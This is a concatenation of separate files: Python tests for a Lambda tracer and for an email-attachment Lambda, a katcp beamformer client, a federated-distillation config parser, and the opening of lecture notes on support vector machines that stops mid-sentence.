    app = LumigoChalice(app)
    @app.on_s3_event(name="test")
    def handler(event, context):
        return "hello world"
    # should run the outer code before lambda execution, but not create span (in global execution)
    assert app.touched
    assert not SpansContainer._span
    # should create a new span (but return the original value)
    assert handler({}, {}) == "hello world"
    assert SpansContainer._span
def test_wrapping_with_logging_override_default_usage(caplog):
    # enhance_print should also prefix logging output with the request id.
    @lumigo_tracer(enhance_print=True)
    def lambda_test_function(event, context):
        logging.warning("hello\nworld")
        return 1
    assert lambda_test_function({}, SimpleNamespace(aws_request_id="1234")) == 1
    assert Configuration.enhanced_print is True
    assert any("RequestId: 1234" in line and "hello" in line for line in caplog.text.split("\n"))
    assert any("RequestId: 1234" in line and "world" in line for line in caplog.text.split("\n"))
def test_wrapping_with_logging_exception(caplog):
    # logger.exception output (message + traceback) should carry exactly one
    # request-id prefix per line.
    @lumigo_tracer(enhance_print=True)
    def lambda_test_function(event, context):
        logger = logging.getLogger("logger_name")
        handler = logging.StreamHandler()
        logger.addHandler(handler)
        try:
            1 / 0
        except Exception:  # You must call the logging.exception method just inside the except part.
            logger.exception("hello")
        return 1
    assert lambda_test_function({}, SimpleNamespace(aws_request_id="1234")) == 1
    # Check all lines have exactly one RequestId.
    for line in caplog.text.splitlines():
        assert line.startswith("RequestId: 1234") and line.count("RequestId: 1234") == 1
    # Check the message was logged.
    test_message = [line for line in caplog.text.splitlines() if line.endswith("hello")][0].replace(
        " ", ""
    )
    assert "ERROR" in test_message and "hello" in test_message
def test_wrapping_with_logging_override_complex_usage():
    # Custom handlers/formatters must keep working under the print override.
    @lumigo_tracer(enhance_print=True)
    def lambda_test_function(event, context):
        handler = logging.StreamHandler(sys.stdout)
        formatter = logging.Formatter("%(name)s [%(levelname)s] %(message)s")  # Format of a client.
        handler.setFormatter(formatter)
        logger = logging.getLogger("my_test")
        logger.handlers = [handler]
        logger.setLevel("INFO")
        logger.info("hello\nworld")
        return 1
    with CaptureOutput() as capturer:
        assert lambda_test_function({}, SimpleNamespace(aws_request_id="1234")) == 1
        assert Configuration.enhanced_print is True
        assert "RequestId: 1234 my_test [INFO] hello" in capturer.get_lines()
        assert "RequestId: 1234 world" in capturer.get_lines()
def test_wrapping_without_logging_override(caplog):
    # Without enhance_print, logging output must be left unprefixed.
    @lumigo_tracer()
    def lambda_test_function(event, context):
        logging.warning("hello\nworld")
        return 1
    assert lambda_test_function({}, SimpleNamespace(aws_request_id="1234")) == 1
    assert Configuration.enhanced_print is False
    assert any(
        "RequestId: 1234" not in line and "world" in line for line in caplog.text.split("\n")
    )
    assert any(
        "RequestId: 1234" not in line and "hello" in line for line in caplog.text.split("\n")
    )
def test_wrapping_urlib_stream_get():
    """
    This is the same case as the one of `requests.get`.
    """
    @lumigo_tracer()
    def lambda_test_function(event, context):
        r = urllib3.PoolManager().urlopen("GET", "https://www.google.com", preload_content=False)
        return b"".join(r.stream(32))
    lambda_test_function({}, None)
    assert len(SpansContainer.get_span().http_spans) == 1
    event = SpansContainer.get_span().http_spans[0]
    assert event["info"]["httpInfo"]["response"]["body"]
    assert event["info"]["httpInfo"]["response"]["statusCode"] == 200
    assert event["info"]["httpInfo"]["host"] == "www.google.com"
@pytest.mark.parametrize(
    "event, expected_triggered_by, expected_message_id",
    [
        ({}, "unknown", None),
        ({"result": 1, LUMIGO_EVENT_KEY: {STEP_FUNCTION_UID_KEY: "123"}}, "stepFunction", "123"),
    ],
)
def test_wrapping_step_function(event, expected_triggered_by, expected_message_id):
    # step_function=True should detect the trigger, propagate the step-function
    # uid into the return value, and emit a synthetic "StepFunction" http span.
    @lumigo_tracer(step_function=True)
    def lambda_test_function(event, context):
        return {"result": 1}
    lambda_test_function(event, None)
    span = SpansContainer.get_span()
    assert len(span.http_spans) == 1
    assert span.function_span["info"]["triggeredBy"] == expected_triggered_by
    assert span.function_span["info"].get("messageId") == expected_message_id
    return_value = json.loads(span.function_span["return_value"])
    assert return_value["result"] == 1
    assert return_value[LUMIGO_EVENT_KEY][STEP_FUNCTION_UID_KEY]
    assert span.http_spans[0]["info"]["httpInfo"]["host"] == "StepFunction"
def test_omitting_keys():
    # Secret-looking keys must be masked in event, return value and http body.
    @lumigo_tracer()
    def lambda_test_function(event, context):
        d = {"a": "b", "myPassword": "<PASSWORD>"}
        conn = http.client.HTTPConnection("www.google.com")
        conn.request("POST", "/", json.dumps(d))
        return {"secret_password": "<PASSWORD>"}
    lambda_test_function({"key": "24"}, None)
    span = SpansContainer.get_span()
    assert span.function_span["return_value"] == '{"secret_password": "****"}'
    assert span.function_span["event"] == '{"key": "****"}'
    spans = json.loads(_create_request_body(SpansContainer.get_span().http_spans, True))
    assert spans[0]["info"]["httpInfo"]["request"]["body"] == json.dumps(
        {"a": "b", "myPassword": "****"}
    )
def test_can_not_wrap_twice(reporter_mock):
    # Double decoration must behave as a single wrap (still two reports).
    @lumigo_tracer()
    @lumigo_tracer()
    def lambda_test_function(event, context):
        return "ret_value"
    result = lambda_test_function({}, SimpleNamespace(aws_request_id="1234"))
    assert result == "ret_value"
    assert reporter_mock.call_count == 2
def test_wrapping_with_tags():
    # add_execution_tag should attach the tag to the function span.
    key = "my_key"
    value = "my_value"
    @lumigo_tracer()
    def lambda_test_function(event, context):
        add_execution_tag(key, value)
        return "ret_value"
    result = lambda_test_function({}, SimpleNamespace(aws_request_id="1234"))
    assert result == "ret_value"
    assert SpansContainer.get_span().function_span[EXECUTION_TAGS_KEY] == [
        {"key": key, "value": value}
    ]
def test_wrapping_with_tags_for_api_gw_headers(monkeypatch):
    # Configured API-GW headers should be auto-tagged from the incoming event.
    set_header_key(monkeypatch, "Accept")
    @lumigo_tracer()
    def lambda_test_function(event, context):
        return "ret_value"
    result = lambda_test_function(api_gw_event(), SimpleNamespace(aws_request_id="1234"))
    assert result == "ret_value"
    assert SpansContainer.get_span().function_span[EXECUTION_TAGS_KEY] == [
        {"key": "Accept", "value": "application/json, text/plain, */*"}
    ]
def test_not_jsonable_return(monkeypatch):
    # A non-serializable return value should be reported as a ReturnValueError.
    @lumigo_tracer()
    def lambda_test_function(event, context):
        return {"a": datetime.datetime.now()}
    lambda_test_function(api_gw_event(), SimpleNamespace(aws_request_id="1234"))
    function_span = SpansContainer.get_span().function_span
    assert function_span["return_value"] is None
    assert function_span["error"]["type"] == "ReturnValueError"
    # following python's runtime: runtime/lambda_runtime_marshaller.py:27
    expected_message = 'The lambda will probably fail due to bad return value. Original message: "Object of type datetime is not JSON serializable"'
    assert function_span["error"]["message"] == expected_message
def test_correct_headers_of_send_after_request():
    # A raw send() following request() should get its own span with its own headers.
    @lumigo_tracer()
    def lambda_test_function(event, context):
        d = {"a": "b", "myPassword": "<PASSWORD>"}
        conn = http.client.HTTPConnection("www.google.com")
        conn.request("POST", "/", json.dumps(d), headers={"a": b"b"})
        conn.send(b"GET\r\nc: d\r\n\r\nbody")
        return {"lumigo": "rulz"}
    lambda_test_function({"key": "24"}, None)
    spans = SpansContainer.get_span().http_spans
    assert spans[0]["info"]["httpInfo"]["request"]["headers"] == json.dumps({"a": "b"})
    assert spans[1]["info"]["httpInfo"]["request"]["headers"] == json.dumps({"c": "d"})
def set_header_key(monkeypatch, header: str):
    # Test helper: restrict the auto-tagged API-GW headers to a single header.
    monkeypatch.setattr(auto_tag_event, "AUTO_TAG_API_GW_HEADERS", [header])
def api_gw_event() -> Dict:
    """Return a representative AWS API Gateway proxy-integration event.

    Mimics a POST to ``/add-user`` routed through CloudFront with a Cognito
    authorizer; tests use it to exercise header auto-tagging and HTTP-event
    parsing. All values are static fixture data.
    """
    return {
        "resource": "/add-user",
        "path": "/add-user",
        "httpMethod": "POST",
        "headers": {
            "Accept": "application/json, text/plain, */*",
            "Accept-Encoding": "gzip, deflate, br",
            "Accept-Language": "he-IL,he;q=0.9,en-US;q=0.8,en;q=0.7",
            "Authorization": "auth",
            "CloudFront-Forwarded-Proto": "https",
            "CloudFront-Is-Desktop-Viewer": "true",
            "CloudFront-Is-Mobile-Viewer": "false",
            "CloudFront-Is-SmartTV-Viewer": "false",
            "CloudFront-Is-Tablet-Viewer": "false",
            "CloudFront-Viewer-Country": "IL",
            "content-type": "application/json;charset=UTF-8",
            "customer_id": "c_1111",
            "Host": "aaaa.execute-api.us-west-2.amazonaws.com",
            "origin": "https://aaa.io",
            "Referer": "https://aaa.io/users",
            "sec-fetch-dest": "empty",
            "sec-fetch-mode": "cors",
            "sec-fetch-site": "cross-site",
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36",
            "Via": "2.0 59574f77a7cf2d23d64904db278e5711.cloudfront.net (CloudFront)",
            "X-Amz-Cf-Id": "J4KbOEUrZCnUQSLsDq1PyYXmfpVy8x634huSeBX0HCbscgH-N2AtVA==",
            "X-Amzn-Trace-Id": "Root=1-5e9bf868-1c53a38cfe070266db0bfbd9",
            "X-Forwarded-For": "172.16.58.3, 172.16.17.32",
            "X-Forwarded-Port": "443",
            "X-Forwarded-Proto": "https",
        },
        # API Gateway duplicates headers here in list form.
        "multiValueHeaders": {
            "Accept": ["application/json, text/plain, */*"],
            "Accept-Encoding": ["gzip, deflate, br"],
            "Accept-Language": ["he-IL,he;q=0.9,en-US;q=0.8,en;q=0.7"],
            "Authorization": ["auth"],
            "CloudFront-Forwarded-Proto": ["https"],
            "CloudFront-Is-Desktop-Viewer": ["true"],
            "CloudFront-Is-Mobile-Viewer": ["false"],
            "CloudFront-Is-SmartTV-Viewer": ["false"],
            "CloudFront-Is-Tablet-Viewer": ["false"],
            "CloudFront-Viewer-Country": ["IL"],
            "content-type": ["application/json;charset=UTF-8"],
            "customer_id": ["c_1111"],
            "Host": ["a.execute-api.us-west-2.amazonaws.com"],
            "origin": ["https://aaa.io"],
            "Referer": ["https://aaa.io/users"],
            "sec-fetch-dest": ["empty"],
            "sec-fetch-mode": ["cors"],
            "sec-fetch-site": ["cross-site"],
            "User-Agent": [
                "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36"
            ],
            "Via": ["2.0 59574f77a7cf2d23d64904db278e5711.cloudfront.net (CloudFront)"],
            "X-Amz-Cf-Id": ["J4KbOEUrZCnUQSLsDq1PyYXmfpVy8x634huSeBX0HCbscgH-N2AtVA=="],
            "X-Amzn-Trace-Id": ["Root=1-5e9bf868-1c53a38cfe070266db0bfbd9"],
            "X-Forwarded-For": ["172.16.58.3, 172.16.17.32"],
            "X-Forwarded-Port": ["443"],
            "X-Forwarded-Proto": ["https"],
        },
        "queryStringParameters": "1",
        "multiValueQueryStringParameters": "1",
        "pathParameters": "1",
        "stageVariables": None,
        "requestContext": {
            "resourceId": "ua33sn",
            "authorizer": {
                "claims": {
                    "sub": "a87005bb-3030-4962-bae8-48cd629ba20b",
                    "custom:customer": "c_1111",
                    "iss": "https://cognito-idp.us-west-2.amazonaws.com/us-west-2",
                    "custom:customer-name": "a",
                    "cognito:username": "aa",
                    "aud": "4lidcnek50hi18996gadaop8j0",
                    "event_id": "9fe80735-f265-41d5-a7ca-04b88c2a4a4c",
                    "token_use": "id",
                    "auth_time": "1587038744",
                    "exp": "Sun Apr 19 08:06:14 UTC 2020",
                    "custom:role": "admin",
                    "iat": "Sun Apr 19 07:06:14 UTC 2020",
                    "email": "<EMAIL>",
                }
            },
            "resourcePath": "/add-user",
            "httpMethod": "POST",
            "extendedRequestId": "LOPAXFcuvHcFUKg=",
            "requestTime": "19/Apr/2020:07:06:16 +0000",
            "path": "/prod/add-user",
            "accountId": "114300393969",
            "protocol": "HTTP/1.1",
            "stage": "prod",
            "domainPrefix": "psqn7b0ev2",
            "requestTimeEpoch": 1587279976628,
            "requestId": "78542821-ca17-4e83-94ec-96993a9d451d",
            "identity": {
                "cognitoIdentityPoolId": None,
                "accountId": None,
                "cognitoIdentityId": None,
                "caller": None,
                "sourceIp": "172.16.58.3",
                "principalOrgId": None,
                "accessKey": None,
                "cognitoAuthenticationType": None,
                "cognitoAuthenticationProvider": None,
                "userArn": None,
                "userAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36",
                "user": None,
            },
            "domainName": "psqn7b0ev2.execute-api.us-west-2.amazonaws.com",
            "apiId": "psqn7b0ev2",
        },
        "body": '{"email":"<EMAIL>"}',
        "isBase64Encoded": False,
    }
|
"""
Client for communicating with the beamformer receiver on kat-dc2.karoo
Author: <NAME>
Date: 2014-01-03
Modified:
"""
from katcp import *
import logging
log = logging.getLogger("katcp")
class FBFClient(BlockingClient):
    """Client for communicating with the beamformer receiver.

    Notes:
    - All commands are blocking.
    - If there is no response to an issued command, an exception is thrown
      with appropriate message after a timeout waiting for the response.
    - If the TCP connection dies, an exception is thrown with an
      appropriate message.
    """

    def __init__(self, host, port=7147, tb_limit=20, timeout=10.0, logger=log):
        """Create a basic DeviceClient.

        @param self This object.
        @param host String: host to connect to.
        @param port Integer: port to connect to.
        @param tb_limit Integer: maximum number of stack frames to
            send in error traceback.
        @param timeout Float: seconds to wait before timing out on
            client operations.
        @param logger Object: Logger to log to.
        """
        super(FBFClient, self).__init__(
            host, port, tb_limit=tb_limit, timeout=timeout, logger=logger)
        self.host = host
        self._timeout = timeout
        # Fix: removed leftover debug print statement (Python-2-only syntax).
        self.start()

    def inform_log(self, message):
        """If we get a log inform, log it."""
        DeviceLogger.log_to_python(self._logger, message)

    def _last_inform_word(self, informs):
        """Return the last whitespace-separated token of the first inform,
        with katcp-escaped spaces ('\\_') restored to real spaces."""
        # Note: '\\_' equals the original '\_' literal; the explicit backslash
        # avoids the invalid-escape-sequence warning on Python 3.
        return str(informs[0]).split()[-1].replace('\\_', " ")

    def _request(self, name, *args):
        """Make a blocking request and check the result.

        Raise a RuntimeError if the reply indicates a request failure.

        @param self This object.
        @param name String: name of the request message to send.
        @param args List of strings: request arguments.
        @return Tuple: containing the reply and a list of inform messages.
        """
        request = Message.request(name, *args)
        # Long-running captures may only reply after a long time; override the
        # client default with a one-hour timeout for requests.
        timeout = 3600.0
        reply, informs = self.blocking_request(request, timeout=timeout, keepalive=True)
        if reply.arguments[0] != Message.OK:
            # Build the message once so the log and the exception always agree.
            msg = ("Request %s failed.\n Request: %s\n Reply: %s."
                   % (request.name, request, reply))
            self._logger.error(msg)
            raise RuntimeError(msg)
        return reply, informs

    def rx_init(self, prefix, halfband=False, transpose=False):
        """Initialise beamformer receiver and set up environment variables for capture

        @param self This object.
        @param prefix String: Data output directory
        @param halfband Boolean: [Optional]Set to record only inner 50% of the band
        @param transpose Boolean: [Optional]Set to transpose time frequency blocks
        @return Boolean: Reply message indicating success.
        """
        # Fix: dropped the no-op "try: ... except: raise" wrapper.
        reply, informs = self._request("rx-init", prefix, int(not halfband), int(transpose))
        return reply.arguments[0] == 'ok'

    def rx_close(self):
        """Closing beamformer receiver

        @param self This object.
        @return String: Directory name where captured data is housed
        """
        reply, informs = self._request("rx-close")
        if reply.arguments[0] == 'ok':
            return reply.arguments[-1]
        raise RuntimeError('Cannot move output directory, verify data in PREFIX directory')

    def rx_meta_init(self, port):
        """Start the receiver to capture beamformer meta data

        @param self This object.
        @param port String: Selected port to output metadata
        @return String: Metadata output port used (None on failure, as before)
        """
        reply, informs = self._request("rx-meta-init", int(port))
        if reply.arguments[0] == 'ok':
            return self._last_inform_word(informs)

    def rx_meta(self, meta_dict=None):
        """Capture beamformer meta data after transmit has started

        @param self This object.
        @param meta_dict Dictionary: Observation specific metadata # temp fix until augmentation of beamformer data
        @return Boolean: Reply message indicating success.
        """
        meta_str = ''
        if meta_dict is not None:
            meta_str = ''.join('%s: %s;' % (key, str(value))
                               for key, value in meta_dict.items())
        reply, informs = self._request("rx-meta", meta_str)
        if reply.arguments[0] == 'ok':
            return True
        raise RuntimeError('Failure to capture meta data')

    def rx_beam(self, pol='h', port='7150'):
        """Capture beamformer data

        @param self This object.
        @param pol String: Polarization associated with beam
        @param port String: Selected port to output metadata
        @return String: Data output port used
        """
        reply, informs = self._request("rx-beam", int(port), pol)
        if reply.arguments[0] == 'ok':
            return self._last_inform_word(informs)

    def rx_stop(self):
        """Safely stops all SPEAD receivers and tear down client connections

        @param self This object.
        @return String: Data output port used
        """
        reply, informs = self._request("rx-stop")
        if reply.arguments[0] == 'ok':
            return self._last_inform_word(informs)
# -fin-
|
<reponame>Ahmedjjj/dataset-distillation<filename>fed_distill/config/parser.py
from typing import Iterable, Optional, Tuple, Union
import numpy as np
from omegaconf import DictConfig
from torch import nn
from torch.utils.data import Dataset
from torchvision.datasets import CIFAR10
import torch
from fed_distill.cifar10 import (inversion_transform, test_transform,
train_transform)
from fed_distill.deep_inv import DeepInversion, DeepInversionLoss
from fed_distill.deep_inv.sampler import (BalancedSampler, RandomSampler,
TargetSampler, WeightedSampler)
from fed_distill.fed import HeterogenousDistribution
from fed_distill.resnet import ResNet18
class _Parser(object):
    """Shared base for the config parsers; holds the optimizer name->class map."""

    _optimizer_to_class = {
        "sgd": torch.optim.SGD,
        "adam": torch.optim.Adam,
    }
class _WorkerParser(_Parser):
    """Builds the model / optimizer / LR scheduler for one worker from its config."""

    _scheduler_to_class = {"multistep_lr": torch.optim.lr_scheduler.MultiStepLR}
    _model_to_class = {"resnet18": ResNet18}

    def __init__(self, cfg: DictConfig, device: str) -> None:
        self._cfg = cfg
        self._device = device

    def model(self) -> nn.Module:
        """Instantiate the configured model and move it to the target device."""
        model_cfg = self._cfg.model
        model_cls = self._model_to_class[model_cfg.name]
        return model_cls(**model_cfg.params).to(self._device)

    def optimizer(self, params: Iterable[torch.Tensor]) -> torch.optim.Optimizer:
        """Construct the configured optimizer over *params*."""
        opt_cfg = self._cfg.optimizer
        opt_cls = self._optimizer_to_class[opt_cfg.name]
        return opt_cls(params, **opt_cfg.params)

    def scheduler(self, optimizer: torch.optim.Optimizer):
        """Construct the configured LR scheduler wrapping *optimizer*."""
        sched_cfg = self._cfg.scheduler
        sched_cls = self._scheduler_to_class[sched_cfg.name]
        return sched_cls(optimizer, **sched_cfg.params)
class StudentParser(_WorkerParser):
    """Worker parser bound to the ``student`` section of the config."""

    def __init__(self, cfg: DictConfig, device: str = "cuda") -> None:
        super().__init__(cfg.student, device)
class TeacherParser(_WorkerParser):
    """Worker parser bound to the ``teacher`` section of the config."""

    def __init__(self, cfg: DictConfig, device: str = "cuda") -> None:
        super().__init__(cfg.teacher, device)
class DatasetParser(_Parser):
    """Builds train/test datasets, optionally restricted to a subset of classes."""

    _dataset_to_class = {"cifar10": CIFAR10}
    _dataset_to_transforms = {"cifar10": (train_transform, test_transform)}

    def __init__(self, cfg: DictConfig) -> None:
        self._cfg = cfg.dataset

    def _restrict_dataset(self, dataset, classes) -> Dataset:
        """Return a Subset of *dataset* keeping only samples whose target is in *classes*."""
        keep = np.argwhere(np.in1d(dataset.targets, classes)).flatten()
        restricted = torch.utils.data.Subset(dataset, keep)
        # Expose .targets on the subset so downstream samplers can still read labels.
        restricted.targets = np.array(dataset.targets)[keep]
        return restricted

    def dataset(
        self, train: Optional[bool] = None
    ) -> Union[Dataset, Tuple[Dataset, Dataset]]:
        """Build the configured dataset(s).

        train=True -> train split; train=False -> test split;
        train=None -> (train, test) tuple.
        """
        dataset_cls = self._dataset_to_class[self._cfg.name]
        tr_transform, te_transform = self._dataset_to_transforms[self._cfg.name]
        train_ds = dataset_cls(
            train=True, transform=tr_transform, **self._cfg.train_params
        )
        test_ds = dataset_cls(
            train=False, transform=te_transform, **self._cfg.test_params
        )
        if "classes" in self._cfg:
            train_ds = self._restrict_dataset(train_ds, self._cfg.classes)
            test_ds = self._restrict_dataset(test_ds, self._cfg.classes)
        if train is None:
            return train_ds, test_ds
        return train_ds if train else test_ds
class FederatedParser(_Parser):
    """Builds the data splitter used to distribute samples across clients."""

    _splitter_to_class = {"heter": HeterogenousDistribution}

    def __init__(self, cfg: DictConfig) -> None:
        self._cfg = cfg.splitter

    def splitter(self):
        """Instantiate the configured splitter with its parameters."""
        splitter_cls = self._splitter_to_class[self._cfg.name]
        return splitter_cls(**self._cfg.params)
class DeepInversionParser(_Parser):
    """Builds the DeepInversion components: loss, input optimizer, transform, sampler."""

    _dataset_to_di_transform = {"cifar10": inversion_transform}

    def __init__(self, cfg: DictConfig) -> None:
        self._cfg = cfg

    def loss(self, classes=None) -> DeepInversionLoss:
        """Construct the inversion loss, optionally restricted to *classes*."""
        return DeepInversionLoss(**self._cfg.deep_inv.loss, classes=classes)

    def optimizer(self):
        """Create the optimizer over a fresh trainable input batch on the GPU."""
        batch_size = self._cfg.student.training.batch_size
        seed_batch = torch.zeros(
            (batch_size, *self._cfg.dataset.input_shape),
            requires_grad=True,
            device="cuda",
        )
        opt_cfg = self._cfg.deep_inv.optimizer
        return self._optimizer_to_class[opt_cfg.name]([seed_batch], **opt_cfg.params)

    def transform(self):
        """Return the dataset-specific inversion transform."""
        return self._dataset_to_di_transform[self._cfg.dataset.name]

    def sampler(self, targets=None) -> TargetSampler:
        """Build the label sampler named in the student config."""
        batch_size = self._cfg.student.training.batch_size
        sampler_classes = {
            "random": RandomSampler,
            "weighted": WeightedSampler,
            "balanced": BalancedSampler,
        }
        kind = self._cfg.student.label_sampler.type
        if kind not in sampler_classes:
            raise NotImplementedError()
        return sampler_classes[kind](batch_size, targets)

    def deep_inversion(self, loss, sampler):
        """Assemble a DeepInversion instance from prebuilt loss/sampler plus config."""
        return DeepInversion(
            loss=loss,
            sampler=sampler,
            optimizer=self.optimizer(),
            grad_updates_batch=self._cfg.deep_inv.gradient_updates,
            input_jitter=self._cfg.deep_inv.jitter,
        )
class ConfigParser(_Parser):
    """Facade exposing the specialised parsers for one experiment config."""

    def __init__(self, cfg: DictConfig) -> None:
        self._student = StudentParser(cfg)
        self._teacher = TeacherParser(cfg)
        self._federated = FederatedParser(cfg)
        self._deep_inv = DeepInversionParser(cfg)
        self._dataset = DatasetParser(cfg)

    @property
    def student(self):
        """Parser for the student worker section."""
        return self._student

    @property
    def teacher(self):
        """Parser for the teacher worker section."""
        return self._teacher

    @property
    def deep_inv(self):
        """Parser for the deep-inversion section."""
        return self._deep_inv

    @property
    def fed(self):
        """Parser for the federated splitter section."""
        return self._federated

    @property
    def dataset(self):
        """Parser for the dataset section."""
        return self._dataset
|
<filename>test_extract_pdf.py<gh_stars>10-100
import pytest
from unittest.mock import MagicMock, patch
import email
from users import UserModel
import lambda_main
class MockUserModel(UserModel):
    """UserModel stub: pretends the backing table always exists and creation succeeds."""
    def exists(self):
        # Always claim the table exists so tests never hit real storage.
        return True
    def create_table(self, wait=True):
        # No-op: report success without creating any real resource.
        return True
# Module-level mocks patched into lambda_main for every test (see mock_lambdamain).
# NOTE(review): call history is never reset between tests, so order-sensitive
# assertions like assert_called_once_with depend on test ordering — consider
# resetting these in a fixture.
mock_register_user = MagicMock(return_value=True)
mock_send_email = MagicMock()
mock_delete_user = MagicMock(return_value=True)
@pytest.fixture(autouse=True)
def mock_lambdamain(monkeypatch):
    """Replace lambda_main's side-effecting user/email helpers with mocks for every test."""
    replacements = {
        "register_user": mock_register_user,
        "send_email_if_enabled": mock_send_email,
        "delete_user": mock_delete_user,
    }
    for attr, replacement in replacements.items():
        monkeypatch.setattr(lambda_main, attr, replacement)
@pytest.fixture
def message_with_one_attachment():
    """Parsed email message carrying a single PDF attachment."""
    with open("./test_data/pdf_one_email.eml", "rb") as handle:
        return email.message_from_binary_file(handle)
@pytest.fixture
def message_with_epub_attachment():
    """Parsed email message carrying a single EPUB attachment."""
    with open("./test_data/epub_email.eml", "rb") as handle:
        return email.message_from_binary_file(handle)
@pytest.fixture
def message_with_multiple_attachments():
    """Parsed email message carrying several attachments."""
    with open("./test_data/multiple_emails.eml", "rb") as handle:
        return email.message_from_binary_file(handle)
@pytest.fixture
def message_with_code():
    """Parsed email whose subject is a registration code."""
    with open("./test_data/code_email.eml", "rb") as handle:
        return email.message_from_binary_file(handle)
@pytest.fixture
def regular_message():
    """Parsed regular email: no code, no unsubscribe, no attachment."""
    with open("./test_data/regular_email.eml", "rb") as handle:
        return email.message_from_binary_file(handle)
@pytest.fixture
def unsubscribe_message():
    """Parsed unsubscribe-request email."""
    with open("./test_data/unsubscribe_email.eml", "rb") as handle:
        return email.message_from_binary_file(handle)
@pytest.fixture
def test_pdf():
    """Raw bytes of the reference PDF fixture (test_pdf.pdf)."""
    with open("./test_data/test_pdf.pdf", "rb") as handle:
        return handle.read()
@pytest.fixture
def test_epub():
    """Raw bytes of the reference EPUB fixture (test_pdf.epub)."""
    # FIXME: fixture file shares the test_pdf name stem; rename for clarity.
    with open("./test_data/test_pdf.epub", "rb") as handle:
        return handle.read()
def test_extract_pdf_code(message_with_code):
    """An email whose subject is an 8-digit code registers the sender.

    extract_pdf registers the user, sends a confirmation email, and reports
    that no attachment was extracted via (False, False).
    """
    extracted = lambda_main.extract_pdf(message_with_code)
    assert extracted == (False, False)
    mock_register_user.assert_called_with("<NAME> <<EMAIL>>", "ABCD1234")
    mock_send_email.assert_called_with(
        "<NAME> <<EMAIL>>",
        subject="Your email address is now verified!",
        message="Your verification succeeded, and you can now email documents to your reMarkable tablet. Try responding to this email with a PDF attachment!",
    )
def test_extract_pdf_single_pdf(message_with_one_attachment, test_pdf):
    """extract_pdf returns the attached PDF's name and exact bytes."""
    extracted = lambda_main.extract_pdf(message_with_one_attachment)
    assert extracted == ("test_pdf.pdf", test_pdf)
def test_extract_pdf_no_pdf(regular_message):
    """Emails without a supported attachment yield (False, False) and notify the sender."""
    extracted = lambda_main.extract_pdf(regular_message)
    assert extracted == (False, False)
    mock_send_email.assert_called_with(
        "<NAME> <<EMAIL>>",
        subject="A problem with your document :(",
        message="Unfortunately, a problem occurred while processing your email. Remailable only supports PDF attachments for now. If you're still encountering issues, please get in touch with Jordan at <EMAIL> or on Twitter at @j6m8.",
    )
def test_extract_pdf_unsubscribe(unsubscribe_message):
    """An unsubscribe email deletes the sender and extracts nothing."""
    extracted = lambda_main.extract_pdf(unsubscribe_message)
    assert extracted == (False, False)
    mock_delete_user.assert_called_once_with(
        "<NAME> <<EMAIL>>",
    )
def test_extract_files_from_email_unsubscribe(unsubscribe_message):
    """Unsubscribe emails map to an UNSUBSCRIBE result with no files."""
    parsed = lambda_main.extract_files_from_email(unsubscribe_message)
    expected = lambda_main.ParseMessageResult(
        sent_from="<NAME> <<EMAIL>>",
        status=lambda_main.MessageStatus.UNSUBSCRIBE,
        subject="Please Unsubscribe Me",
        extracted_files=[],
    )
    assert parsed == expected
def test_extract_files_from_email_register(message_with_code):
    """Code-subject emails map to a REGISTER result carrying the code as subject."""
    parsed = lambda_main.extract_files_from_email(message_with_code)
    expected = lambda_main.ParseMessageResult(
        sent_from="<NAME> <<EMAIL>>",
        status=lambda_main.MessageStatus.REGISTER,
        subject="ABCD1234",
        extracted_files=[],
    )
    assert parsed == expected
def test_extract_files_from_email_pdf(message_with_one_attachment, test_pdf):
    """A single-PDF email maps to SUCCESS with that one file extracted."""
    parsed = lambda_main.extract_files_from_email(message_with_one_attachment)
    expected = lambda_main.ParseMessageResult(
        sent_from="<NAME> <<EMAIL>>",
        status=lambda_main.MessageStatus.SUCCESS,
        subject="Re: Test email with test PDF",
        extracted_files=[("test_pdf.pdf", test_pdf)],
    )
    assert parsed == expected
def test_extract_files_from_email_epub(message_with_epub_attachment, test_epub):
    """An EPUB email maps to SUCCESS with the epub extracted."""
    parsed = lambda_main.extract_files_from_email(message_with_epub_attachment)
    assert parsed["sent_from"] == "<NAME> <<EMAIL>>"
    assert parsed["status"] == lambda_main.MessageStatus.SUCCESS
    assert parsed["subject"] == "Email with an EPUB attachment"
    assert parsed["extracted_files"] == [("test_pdf.epub", test_epub)]
def test_extract_files_from_email_multiple(message_with_multiple_attachments, test_epub, test_pdf):
    """All attachments of a multi-attachment email are extracted (order-insensitive)."""
    parsed = lambda_main.extract_files_from_email(message_with_multiple_attachments)
    assert parsed["sent_from"] == "<NAME> <<EMAIL>>"
    assert parsed["status"] == lambda_main.MessageStatus.SUCCESS
    assert parsed["subject"] == "An email with multiple files"
    expected_files = sorted([("test_pdf.epub", test_epub), ("test_pdf.pdf", test_pdf)])
    assert sorted(parsed["extracted_files"]) == expected_files
def test_extract_files_from_email_error(message_with_one_attachment, test_pdf):
    # TODO: placeholder — the error path of extract_files_from_email is not
    # exercised yet, so this test always passes. NOTE(review): implement the
    # error-case assertions or mark as skip/xfail so the coverage gap stays visible.
    assert True
|
# Support Vector Machines
## Introduction
A Support Vector Machine (SVM) is a very powerful and versatile
Machine Learning method, capable of performing linear or nonlinear
classification, regression, and even outlier detection. It is one of
the most popular models in Machine Learning, and anyone interested in
Machine Learning should have it in their toolbox. SVMs are
particularly well suited for classification of complex but small-sized or
medium-sized datasets.
The case with two well-separated classes only can be understood in an
intuitive way in terms of lines in a two-dimensional space separating
the two classes (see figure below).
The basic mathematics behind the SVM is however less familiar to most of us.
It relies on the definition of hyperplanes and the
definition of a **margin** which separates classes (in case of
classification problems) of variables. It is also used for regression
problems.
With SVMs we distinguish between hard margin and soft margins. The
latter introduces a so-called softening parameter to be discussed
below. We distinguish also between linear and non-linear
approaches. The latter are the most frequent ones since it is rather
unlikely that we can separate classes easily by say straight lines.
## Hyperplanes and all that
The theory behind support vector machines (SVM hereafter) is based on
the mathematical description of so-called hyperplanes. Let us start
with a two-dimensional case. This will also allow us to introduce our
first SVM examples. These will be tailored to the case of two specific
classes, as displayed in the figure here based on the usage of the petal data.
We assume here that our data set can be well separated into two
domains, where a straight line does the job in the separating the two
classes. Here the two classes are represented by either squares or
